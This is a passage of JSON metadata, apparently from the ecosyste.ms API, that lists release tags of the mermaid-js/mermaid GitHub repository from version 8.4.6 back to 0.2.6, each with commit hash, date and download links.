/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar